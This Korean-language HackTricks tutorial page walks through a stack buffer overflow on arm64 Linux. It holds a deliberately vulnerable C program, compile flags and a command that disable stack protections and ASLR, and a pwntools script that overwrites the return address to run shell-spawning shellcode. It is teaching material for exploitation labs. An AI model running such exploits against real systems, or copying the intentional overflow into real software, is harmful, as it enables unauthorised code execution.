Stack Shellcode - arm64

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

arm64์— ๋Œ€ํ•œ ์†Œ๊ฐœ๋Š” ๋‹ค์Œ์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

Introduction to ARM64v8

Linux

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

pie, canary ๋ฐ nx ์—†์ด ์ปดํŒŒ์ผ:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

ASLR ์—†์Œ & canary ์—†์Œ - Stack Overflow

ASLR๋ฅผ ์ค‘์ง€ํ•˜๋ ค๋ฉด ๋‹ค์Œ์„ ์‹คํ–‰ํ•˜์„ธ์š”:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

bof์˜ offset์„ ํ™•์ธํ•˜๋ ค๋ฉด ์ด ๋งํฌ๋ฅผ ํ™•์ธํ•˜์„ธ์š”.

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

์—ฌ๊ธฐ์„œ ์ฐพ๊ธฐ โ€œ๋ณต์žกํ•œโ€ ์œ ์ผํ•œ ๋ถ€๋ถ„์€ ํ˜ธ์ถœํ•  stack์˜ ์ฃผ์†Œ์ž…๋‹ˆ๋‹ค. ์ œ ๊ฒฝ์šฐ์—๋Š” gdb๋กœ ์ฐพ์€ ์ฃผ์†Œ๋กœ exploit์„ ์ƒ์„ฑํ–ˆ์ง€๋งŒ, ์‹ค์ œ๋กœ ์‹คํ–‰ํ•ด๋ณด๋‹ˆ ์ž‘๋™ํ•˜์ง€ ์•Š์•˜์Šต๋‹ˆ๋‹ค(์™œ๋ƒํ•˜๋ฉด stack ์ฃผ์†Œ๊ฐ€ ์•ฝ๊ฐ„ ๋ฐ”๋€Œ์—ˆ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค).

์ƒ์„ฑ๋œ core file (gdb ./bog ./core)์„ ์—ด์–ด shellcode ์‹œ์ž‘์˜ ์‹ค์ œ ์ฃผ์†Œ๋ฅผ ํ™•์ธํ–ˆ์Šต๋‹ˆ๋‹ค.

macOS

Tip

macOS์—์„œ๋Š” NX๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค. arm64์—์„œ๋Š” ์ด ๋ชจ๋“œ๊ฐ€ ํ•˜๋“œ์›จ์–ด ์ˆ˜์ค€์—์„œ ๊ตฌํ˜„๋˜์–ด ์žˆ์–ด ๋น„ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์—†์œผ๋ฏ€๋กœ macOS์—์„œ๋Š” stack์— shellcode๊ฐ€ ์žˆ๋Š” ์˜ˆ์ œ๋ฅผ ์ฐพ๊ธฐ ์–ด๋ ต์Šต๋‹ˆ๋‹ค.

๋‹ค์Œ์—์„œ macOS ret2win ์˜ˆ์ œ๋ฅผ ํ™•์ธํ•˜์„ธ์š”:

Ret2win - arm64

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ